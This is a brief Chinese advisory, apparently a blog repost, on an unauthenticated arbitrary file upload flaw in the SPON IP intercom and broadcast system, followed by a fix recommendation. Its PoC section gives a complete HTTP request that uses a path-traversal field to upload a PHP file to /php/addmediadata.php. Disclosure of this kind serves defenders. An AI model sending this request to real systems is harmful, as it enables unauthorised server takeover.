0x00 漏洞编号暂无0x01 危险等级高危
0x02 漏洞概述世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。0x03 漏洞详情漏洞类型:任意文件上传
影响:上传恶意脚本简述:世邦通信SPON IP网络对讲广播系统的/php/addmediadata.php接口存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传恶意脚本文件,从而控制整个服务器。0x04 影响版本SPON IP网络对讲广播系统0x05 POCPOST /php/addmediadata.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16Content-Type: multipart/form-data;boundary=xxxxxxxxAccept-Encoding: gzip, deflate, brConnection: close
--xxxxxxxxContent-Disposition: form-data; name="fullpath"
../--xxxxxxxxContent-Disposition: form-data; name="subpath"
/--xxxxxxxxContent-Disposition: form-data; name="file"; filename="test.php"Content-Type: application/octet-stream
--xxxxxxxx--仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。0x06 修复建议目前官方已发布漏洞修复版本,建议用户升级到安全版本:https://www.spon.com.cn/
标签:form,世邦,--,IP,漏洞,广播系统,php,上传 From: https://blog.csdn.net/2301_77604523/article/details/141467656